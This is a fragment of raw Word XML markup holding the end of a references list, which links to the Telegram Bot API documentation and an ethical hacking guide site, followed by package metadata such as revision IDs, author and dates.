        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FED2C3E" w14:textId="660B3A19" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">2. Telegram API Docs – </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="00170433" w:rsidRPr="0035182D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://core.telegram.org/bots/api</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00170433">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C72A08" w14:textId="32B5E674" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">3. Ethical Hacking Guides – </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="00170433" w:rsidRPr="0035182D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.hackingloops.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00170433">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA430C5" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="7877F7A5" w14:textId="4299CD4A" w:rsidR="00EE4A29" w:rsidRDefault="00EE4A29" w:rsidP="00A92A0C"/>
    <w:sectPr w:rsidR="00EE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0C"/>
    <w:rsid w:val="00016E94"/>
    <w:rsid w:val="00050297"/>
    <w:rsid w:val="000D2977"/>
    <w:rsid w:val="001546DD"/>
    <w:rsid w:val="00170433"/>
    <w:rsid w:val="001D5583"/>
    <w:rsid w:val="002B43BD"/>
    <w:rsid w:val="00487B15"/>
    <w:rsid w:val="004C4796"/>
    <w:rsid w:val="00691610"/>
    <w:rsid w:val="00812E4D"/>
    <w:rsid w:val="009E167E"/>
    <w:rsid w:val="00A14ACD"/>
    <w:rsid w:val="00A338AD"/>
    <w:rsid w:val="00A92A0C"/>
    <w:rsid w:val="00CD7864"/>
    <w:rsid w:val="00D162F5"/>
    <w:rsid w:val="00D43D62"/>
    <w:rsid w:val="00DB536A"/>
    <w:rsid w:val="00E46F29"/>
    <w:rsid w:val="00E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E1BB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CE60DDD3-8D2A-420D-A5A8-B44A8F79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A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ingloops.com/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://core.telegram.org/bots/api" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs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 naik</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>manish m naik</cp:lastModifiedBy>
  <cp:revision>22</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-02-19T13:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-19T14:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>